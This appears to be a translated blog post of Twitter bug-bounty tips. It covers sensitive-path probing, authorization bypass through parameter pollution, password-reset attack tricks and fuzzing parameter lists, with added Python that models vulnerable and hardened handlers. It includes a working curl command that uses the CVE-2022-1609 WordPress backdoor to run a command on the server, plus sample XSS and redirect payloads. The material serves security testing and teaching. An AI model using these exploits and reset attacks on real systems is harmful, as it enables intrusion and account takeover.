Useful stuff | Twitter pentesting tips, collected (part 3)

Posted 2022-6-2 23:49:39

Original article: 干货 | Twitter渗透技巧搬运工(三) (qq.com)

  /.git/HEAD
  /.git/logs/HEAD
  /.import/
  /.bashrc
  /admin-cgi
  /admin-console
  /backup/
  /console/
  /console/login
  /h2console
  /cgi-bin/admin.cgi
  /jmx-console/
  /portal/
  /portal/login
  /syslog/
  /web-console
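As an added example, not part of the original post, here is a Python probe for the path list above. It takes a pluggable fetch function so it runs offline against constructed responses, calibrates against a soft-404 page first (many sites answer every unknown path with 200), and for the .git and .bashrc paths checks the body for a content signature instead of trusting the status code. The fetch function, the fake site and the signature checks are assumptions for illustration.

```python
import re
from typing import Callable, Dict, List, Tuple

# The path list from the post above.
SENSITIVE_PATHS = [
    "/.git/HEAD", "/.git/logs/HEAD", "/.import/", "/.bashrc", "/admin-cgi",
    "/admin-console", "/backup/", "/console/", "/console/login", "/h2console",
    "/cgi-bin/admin.cgi", "/jmx-console/", "/portal/", "/portal/login",
    "/syslog/", "/web-console",
]

# Body signatures for paths whose content is predictable (assumed, illustrative).
# A bare 200 is weak evidence on sites that answer every unknown path with a soft 404.
_SHA1 = re.compile(r"^[0-9a-f]{40}$")
SIGNATURES = {
    "/.git/HEAD": lambda b: b.strip().startswith("ref: refs/") or bool(_SHA1.match(b.strip())),
    "/.git/logs/HEAD": lambda b: bool(re.match(r"^[0-9a-f]{40} [0-9a-f]{40} ", b)),
    "/.bashrc": lambda b: "export " in b or "alias " in b,
}

Fetcher = Callable[[str], Tuple[int, str]]  # url -> (status, body)


def probe(base: str, fetch: Fetcher) -> List[Dict[str, str]]:
    """Request each path; return findings with a confidence label."""
    base = base.rstrip("/")
    # Calibrate: fetch a path that cannot exist and remember what a soft 404 looks like.
    soft_status, soft_body = fetch(base + "/this-path-should-not-exist-8f3a1")
    findings = []
    for path in SENSITIVE_PATHS:
        status, body = fetch(base + path)
        if status != 200:
            continue
        if soft_status == 200 and body == soft_body:
            continue  # identical to the soft-404 page: not a real hit
        if path in SIGNATURES:
            confidence = "high" if SIGNATURES[path](body) else "low"
        else:
            confidence = "medium"
        findings.append({"path": path, "confidence": confidence})
    return findings


# Constructed offline responses standing in for a real HTTP client.
SOFT_404 = (200, "<html><body>Page not found</body></html>")
FAKE_SITE = {
    "/.git/HEAD": (200, "ref: refs/heads/main\n"),
    "/.git/logs/HEAD": (200, "0" * 40 + " " + "a" * 40
                        + " dev <dev@example> 1650000000 +0000\tcommit (initial): init\n"),
    "/.import/": (200, "<html><body>Index of /.import/</body></html>"),
    "/.bashrc": (200, "<html><body>Login</body></html>"),  # 200, but not a shell rc file
    "/jmx-console/": (200, "<html><title>JBoss JMX Management Console</title></html>"),
    "/console/login": (403, "Forbidden"),
}


def fake_fetch(url: str) -> Tuple[int, str]:
    path = url[len("https://target.example"):]
    return FAKE_SITE.get(path, SOFT_404)


if __name__ == "__main__":
    for finding in probe("https://target.example", fake_fetch):
        print(finding)
```

Against a live target you would pass a real fetcher, for example one built on `requests.get(url, timeout=10, allow_redirects=False)` returning `(r.status_code, r.text)`; redirects are deliberately not followed so a login bounce is not mistaken for a hit.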
Unauthorized-access bug-hunting tips

  {"id":111} ⟶ 401 Unauthorized
  {"id":{"id":111}} ⟶ 200 OK

  POST /api/get_profile
  Content-Type: application/json

  {"user_id":<attacker_id>,"user_id":<victim's_id>}

  GET /api_v1/messages?user_id=VICTIM_ID ⟶ 401
  GET /api_v1/messages?user_id=attack&user_id=VICTIM ⟶ 200 OK
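Added example, not from the original post: a Python model of why the request pairs above flip from 401 to 200. In every case the authorization check and the data access read the same parameter under different rules: first versus last value of a repeated query parameter, first-wins versus last-wins for a duplicated JSON key, and an int-only check that never fires on a nested object. The handlers, the session id and the message store are constructed for illustration and do not describe any particular product.

```python
import json
from urllib.parse import parse_qs

# Constructed data: the attacker's own session id and per-user private messages.
SESSION_USER = 100
MESSAGES = {100: ["attacker's own message"], 111: ["victim's private message"]}


def _first_wins(pairs):
    """JSON object hook that keeps the FIRST duplicate key (some parsers and WAFs do)."""
    out = {}
    for key, value in pairs:
        out.setdefault(key, value)
    return out


def duplicate_key_readings(body):
    """Return (first-wins, last-wins) readings of user_id from a JSON body.
    Python's json.loads keeps the LAST duplicate, so a front-end filter that keeps
    the first one authorizes a different id than the back end uses."""
    return (json.loads(body, object_pairs_hook=_first_wins)["user_id"],
            json.loads(body)["user_id"])


def vulnerable_messages(query):
    """Illustrative weak pattern: authz reads the first user_id, the data layer the last."""
    ids = parse_qs(query).get("user_id", [])
    if not ids or int(ids[0]) != SESSION_USER:
        return 401, []
    owner = int(ids[-1])
    return 200, MESSAGES.get(owner, [])


def vulnerable_profile(body):
    """Illustrative nested-object bypass: the authz check only fires when id is an int,
    while the lookup helper happily unwraps {"id": {"id": ...}}."""
    ident = json.loads(body).get("id")
    if isinstance(ident, int) and ident != SESSION_USER:
        return 401, []
    while isinstance(ident, dict):  # "reference resolving" helper
        ident = ident.get("id")
    return 200, MESSAGES.get(ident, [])


def hardened_messages(query):
    ids = parse_qs(query).get("user_id", [])
    if len(ids) != 1 or not ids[0].isdigit():  # exactly one, well-typed value
        return 400, []
    owner = int(ids[0])
    if owner != SESSION_USER:                  # authorize the very value used for lookup
        return 401, []
    return 200, MESSAGES.get(owner, [])


def hardened_profile(body):
    ident = json.loads(body).get("id")
    if not isinstance(ident, int) or isinstance(ident, bool):
        return 400, []
    if ident != SESSION_USER:
        return 401, []
    return 200, MESSAGES.get(ident, [])


if __name__ == "__main__":
    print(vulnerable_messages("user_id=100&user_id=111"))
    print(hardened_messages("user_id=100&user_id=111"))
    print(vulnerable_profile('{"id": {"id": 111}}'))
    print(duplicate_key_readings('{"user_id": 100, "user_id": 111}'))
```

The fix is the same in every case: reject polluted input (more than one copy, wrong type) and make the authorization decision on exactly the value that the data layer will use.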


GitHub dork tips

  User:XXX First Name Last Name
  User:XXX Firstname Lastname
  User:XXX Full Name
  User:XXX Fullname


Password reset bug-hunting tips
  1- Completely remove the token
  2- Change it to 00000000...
  3- Use a null/nil value
  4- Try an expired token
  5- Try an array of old tokens
  6- Look for race conditions
  7- Change 1 char at the begin/end to see if the token is evaluated
  8- Use unicode char jutsu to spoof the email address
  9- Try victim@email.com&attacker@email.com, using %20 or | as separators
  10- Try to register the same mail with a different TLD (.eu, .net etc.)
  11- Don't add the domain locu@
  12- Try sqli bypass and wildcards: or, %, *
  13- Request smuggler?
  14- Change the request method (get, put, post etc.) and/or content type (xml<>json)
  15- Match a bad response and replace it with a good one
  16- Use a super long string
  17- Send a massive token
  18- Send null fields
  19- Send a -*-*-*--""---*-*;*;*-*--*-*;*;*-*-*+;**;;*+*+*!*!*+*++*;*;*+*+*+*++*;
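As an added example, not part of the original post, the Python harness below turns tips 1, 2, 3, 4, 7, 16, 17 and 18 above into concrete inputs and runs them against two token validators: an illustrative weak one (assumed pattern: a falsy token skips the check, only a prefix is compared, expiry and single use are never enforced) and a hardened one (type and length check, constant-time comparison of the whole token, expiry, one use). Both validators, the in-memory store and the mutation set are assumptions for illustration.

```python
import hmac
import secrets
import time


def issue_token(store, user, ttl=900, now=None):
    """Issue a reset token into the constructed in-memory store: token -> record."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    store[token] = {"user": user, "exp": now + ttl, "used": False}
    return token


def vulnerable_check(store, user, token, now=None):
    """Illustrative weak validator (assumed, not from any named product)."""
    if not token:                      # tips 1/3/18: missing or null token skips the check
        return True
    for stored, rec in store.items():  # tip 7: only the first 8 chars are compared
        if rec["user"] == user and stored[:8] == str(token)[:8]:
            return True                # tip 4: expiry and single use never enforced
    return False


def hardened_check(store, user, token, now=None):
    """Type/length check, constant-time full comparison, expiry, single use."""
    now = time.time() if now is None else now
    if not isinstance(token, str) or not 32 <= len(token) <= 64:
        return False
    for stored, rec in store.items():
        if rec["user"] == user and hmac.compare_digest(stored, token):
            if rec["used"] or now > rec["exp"]:
                return False
            rec["used"] = True          # consume on success
            return True
    return False


def _flip(s, i):
    """Change one character so the token differs at position i."""
    i = i % len(s)
    c = "A" if s[i] != "A" else "B"
    return s[:i] + c + s[i + 1:]


def mutations(token, expired_token):
    """Concrete inputs for the numbered tips above."""
    return {
        "removed": "",                          # 1
        "zeros": "0" * len(token),              # 2
        "null": None,                           # 3
        "expired": expired_token,               # 4
        "first_char_changed": _flip(token, 0),  # 7
        "last_char_changed": _flip(token, -1),  # 7
        "super_long": token + "A" * 5000,       # 16/17
        "null_field_array": [token],            # 18 (wrong type)
    }


def run_checklist(check, store, user, token, expired_token, now):
    return {name: check(store, user, value, now)
            for name, value in mutations(token, expired_token).items()}


def demo():
    now = 1_700_000_000
    store = {}
    expired = issue_token(store, "victim", now=now - 3600)  # issued an hour ago, 15 min ttl
    token = issue_token(store, "victim", now=now)
    weak = run_checklist(vulnerable_check, store, "victim", token, expired, now)
    strong = run_checklist(hardened_check, store, "victim", token, expired, now)
    first_use = hardened_check(store, "victim", token, now)
    second_use = hardened_check(store, "victim", token, now)
    return weak, strong, first_use, second_use


if __name__ == "__main__":
    weak, strong, first_use, second_use = demo()
    print("weak   :", weak)
    print("strong :", strong)
    print("genuine token, first/second use:", first_use, second_use)
```

The weak validator accepts the removed, null, expired, last-char-changed and over-long variants; the hardened one rejects all of them and accepts the genuine token exactly once. The same mutation table can drive a real target by swapping the check function for an HTTP call.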

Source: https://twitter.com/Omar_J_Ahmed/status/1530649092577173507?s=20&t=WC6ryJ-bM7QVkDzU71iusg
CVE-2022-1609 WordPress Weblizar Backdoor

  $ curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license'
  uid=33(www-data) gid=33(www-data) groups=33(www-data)


Source: https://twitter.com/momika233/status/1529694086193508353?s=20&t=WC6ryJ-bM7QVkDzU71iusg

Akamai XSS WAF Bypass





Source: https://twitter.com/0x0SojalSec/ ... ryJ-bM7QVkDzU71iusg

The parameter names below are the ones commonly fed to scanners or used in manual hunting. When you meet one of them on a target, fuzz it for the corresponding vulnerability class to verify.

Common XSS parameters

  ?q={payload}
  ?s={payload}
  ?search={payload}
  ?id={payload}
  ?lang={payload}
  ?keyword={payload}
  ?query={payload}
  ?page={payload}
  ?keywords={payload}
  ?year={payload}
  ?view={payload}
  ?email={payload}
  ?type={payload}
  ?name={payload}
  ?p={payload}
  ?month={payload}
  ?image={payload}
  ?list_type={payload}
  ?url={payload}
  ?terms={payload}
  ?categoryid={payload}
  ?key={payload}
  ?login={payload}
  ?begindate={payload}
  ?enddate={payload}




Common SSRF parameters

  ?dest={target}
  ?redirect={target}
  ?uri={target}
  ?path={target}
  ?continue={target}
  ?url={target}
  ?window={target}
  ?next={target}
  ?data={target}
  ?reference={target}
  ?site={target}
  ?html={target}
  ?val={target}
  ?validate={target}
  ?domain={target}
  ?callback={target}
  ?return={target}
  ?page={target}
  ?feed={target}
  ?host={target}
  ?port={target}
  ?to={target}
  ?out={target}
  ?view={target}
  ?dir={target}


Source: https://twitter.com/NandanLohita ... ryJ-bM7QVkDzU71iusg
Common LFI (local file inclusion) parameters

  ?cat={payload}
  ?dir={payload}
  ?action={payload}
  ?board={payload}
  ?date={payload}
  ?detail={payload}
  ?file={payload}
  ?download={payload}
  ?path={payload}
  ?folder={payload}
  ?prefix={payload}
  ?include={payload}
  ?page={payload}
  ?inc={payload}
  ?locate={payload}
  ?show={payload}
  ?doc={payload}
  ?site={payload}
  ?type={payload}
  ?view={payload}
  ?content={payload}
  ?document={payload}
  ?layout={payload}
  ?mod={payload}
  ?conf={payload}

Common SQL injection parameters

  ?id=
  ?page=
  ?dir=
  ?search=
  ?category=
  ?file=
  ?class=
  ?url=
  ?news=
  ?item=
  ?menu=
  ?lang=
  ?name=
  ?ref=
  ?title=
  ?view=
  ?topic=
  ?thread=
  ?type=
  ?date=
  ?form=
  ?join=
  ?main=
  ?nav=
  ?region=

Common RCE (remote code execution) parameters

  ?cmd=
  ?exec=
  ?command=
  ?execute=
  ?ping=
  ?query=
  ?jump=
  ?code=
  ?reg=
  ?do=
  ?func=
  ?arg=
  ?option=
  ?load=
  ?process=
  ?step=
  ?read=
  ?function=
  ?req=
  ?feature=
  ?exe=
  ?module=
  ?payload=
  ?run=
  ?print=


Common URL redirect parameters
  ?next={payload}
  ?url={payload}
  ?target={payload}
  ?rurl={payload}
  ?dest={payload}
  ?destination={payload}
  ?redir={payload}
  ?redirect_uri={payload}
  ?redirect_url={payload}
  ?redirect={payload}
  /redirect/{payload}
  /cgi-bin/redirect.cgi?{payload}
  /out/{payload}
  /out?{payload}
  ?view={payload}
  /login?to={payload}
  ?image_url={payload}
  ?go={payload}
  ?return={payload}
  ?returnTo={payload}
  ?return_to={payload}
  ?checkout_url={payload}
  ?continue={payload}
  ?return_path={payload}
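Added example, not part of the original post: a small Python triage tool that turns the six parameter lists above (XSS, SSRF, LFI, SQLi, RCE, redirect) into lookup tables, maps every parameter in a batch of URLs to the classes worth fuzzing, and rewrites one parameter with a payload. Names are compared case-insensitively (so `returnTo` is stored as `returnto`) and `email[]` is treated as `email`. The sample URLs and the payload are constructed for illustration.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# The parameter lists from the post above, lower-cased, keyed by class to fuzz for.
PARAM_HINTS = {
    "xss": {"q", "s", "search", "id", "lang", "keyword", "query", "page", "keywords", "year",
            "view", "email", "type", "name", "p", "month", "image", "list_type", "url", "terms",
            "categoryid", "key", "login", "begindate", "enddate"},
    "ssrf": {"dest", "redirect", "uri", "path", "continue", "url", "window", "next", "data",
             "reference", "site", "html", "val", "validate", "domain", "callback", "return",
             "page", "feed", "host", "port", "to", "out", "view", "dir"},
    "lfi": {"cat", "dir", "action", "board", "date", "detail", "file", "download", "path",
            "folder", "prefix", "include", "page", "inc", "locate", "show", "doc", "site",
            "type", "view", "content", "document", "layout", "mod", "conf"},
    "sqli": {"id", "page", "dir", "search", "category", "file", "class", "url", "news", "item",
             "menu", "lang", "name", "ref", "title", "view", "topic", "thread", "type", "date",
             "form", "join", "main", "nav", "region"},
    "rce": {"cmd", "exec", "command", "execute", "ping", "query", "jump", "code", "reg", "do",
            "func", "arg", "option", "load", "process", "step", "read", "function", "req",
            "feature", "exe", "module", "payload", "run", "print"},
    "redirect": {"next", "url", "target", "rurl", "dest", "destination", "redir", "redirect_uri",
                 "redirect_url", "redirect", "view", "to", "image_url", "go", "return",
                 "returnto", "return_to", "checkout_url", "continue", "return_path"},
}
# Path-style redirect sinks from the same list.
REDIRECT_PATH_PREFIXES = ("/redirect/", "/out/", "/cgi-bin/redirect.cgi")


def classify_param(name):
    """Vulnerability classes a parameter name hints at (sorted, possibly empty)."""
    base = name[:-2] if name.endswith("[]") else name
    base = base.lower()
    return sorted(cls for cls, names in PARAM_HINTS.items() if base in names)


def triage(urls):
    """Map each URL to {parameter: [classes]}; URLs with nothing interesting are omitted."""
    result = {}
    for url in urls:
        parts = urlsplit(url)
        hints = {}
        for name, _ in parse_qsl(parts.query, keep_blank_values=True):
            classes = classify_param(name)
            if classes:
                hints[name] = classes
        if parts.path.startswith(REDIRECT_PATH_PREFIXES) or parts.path == "/out":
            hints["<path>"] = ["redirect"]
        if hints:
            result[url] = hints
    return result


def with_payload(url, param, payload):
    """Return the URL with one parameter's value replaced by the (URL-encoded) payload."""
    parts = urlsplit(url)
    pairs = [(k, payload if k == param else v)
             for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return urlunsplit(parts._replace(query=urlencode(pairs)))


if __name__ == "__main__":
    # Constructed sample URLs, as they might come out of a crawl or an archive export.
    sample = [
        "https://shop.example/search?q=shoes&page=2",
        "https://app.example/login?to=/home",
        "https://app.example/api/ping?cmd=ls",
        "https://app.example/out/https://evil.example",
        "https://static.example/img/logo.png",
    ]
    for url, hints in triage(sample).items():
        print(url, hints)
    print(with_payload(sample[0], "q", "<svg/onload=alert(1)>"))
```

Generic names such as `page` or `view` hit several classes at once, which is exactly the signal to fuzz them with more than one payload family.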

Source: https://github.com/lutfumertceylan/top25-parameter

Email password reset bug tips: during a password reset, try submitting several emails and check whether both of your mailboxes receive the message

  email=victim&email=attacker
  email[]=victim&email[]=attacker
  email=victim,attacker
  {email: victim, email:attacker}
  {email: [victim,attacker]}
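Added example, not part of the original post: a Python model of the reset-mail handler these five inputs are aimed at. The loose version (an assumed pattern, not any named product) flattens repeated fields, `email[]` arrays, JSON arrays and comma/space/pipe separated values into one recipient list and sends the link to all of them as long as one is a registered user. The strict version accepts exactly one scalar field, rejects duplicate JSON keys, NFKC-normalizes and restricts the address to ASCII (the "unicode char jutsu" case from the earlier list), and mails only the address on file. The user table is constructed.

```python
import json
import re
import unicodedata
from urllib.parse import parse_qs

# Constructed user table: normalized address -> address stored for the account.
USERS = {"victim@example.com": "victim@example.com"}


def lookup(email):
    return USERS.get(email)


def loose_recipients(content_type, raw):
    """Illustrative weak handling: every spelling of the field becomes a recipient."""
    if content_type == "application/json":
        value = json.loads(raw).get("email")          # duplicate keys: last one wins here
        values = value if isinstance(value, list) else [value]
    else:
        qs = parse_qs(raw)
        values = qs.get("email", []) + qs.get("email[]", [])
    out = []
    for v in values:
        out.extend(p for p in re.split(r"[,;|\s]+", str(v)) if p)
    return out


def loose_send_reset(content_type, raw):
    """Sends the reset link to EVERY extracted address if ANY of them belongs to a user."""
    rcpts = loose_recipients(content_type, raw)
    return rcpts if any(lookup(r) for r in rcpts) else []


_ADDR = re.compile(r"^[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,}$")


def _reject_duplicates(pairs):
    keys = [k for k, _ in pairs]
    if len(keys) != len(set(keys)):
        raise ValueError("duplicate JSON key")
    return dict(pairs)


def strict_send_reset(content_type, raw):
    """Exactly one scalar email field, normalized and ASCII-only; the link goes to the
    address on file (or nowhere), never to the raw input. Returns the recipient or None."""
    if content_type == "application/json":
        try:
            value = json.loads(raw, object_pairs_hook=_reject_duplicates).get("email")
        except ValueError:                   # includes JSONDecodeError
            return None
    else:
        qs = parse_qs(raw)
        if "email[]" in qs or len(qs.get("email", [])) != 1:
            return None
        value = qs["email"][0]
    if not isinstance(value, str):
        return None
    value = unicodedata.normalize("NFKC", value).strip().lower()
    if not value.isascii() or not _ADDR.match(value):
        return None
    return lookup(value)


if __name__ == "__main__":
    form = "application/x-www-form-urlencoded"
    print(loose_send_reset(form, "email=victim@example.com&email=attacker@example.com"))
    print(strict_send_reset(form, "email=victim@example.com&email=attacker@example.com"))
    print(strict_send_reset(form, "email=\uff56ictim@example.com"))  # fullwidth v normalizes
```

A full-width or otherwise decomposable character normalizes to the stored account and the mail still goes to the stored address only; a true homoglyph such as Cyrillic е survives NFKC and is rejected by the ASCII check.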

Recommended reading: https://github.com/vavkamil/awesome-bugbounty-tools
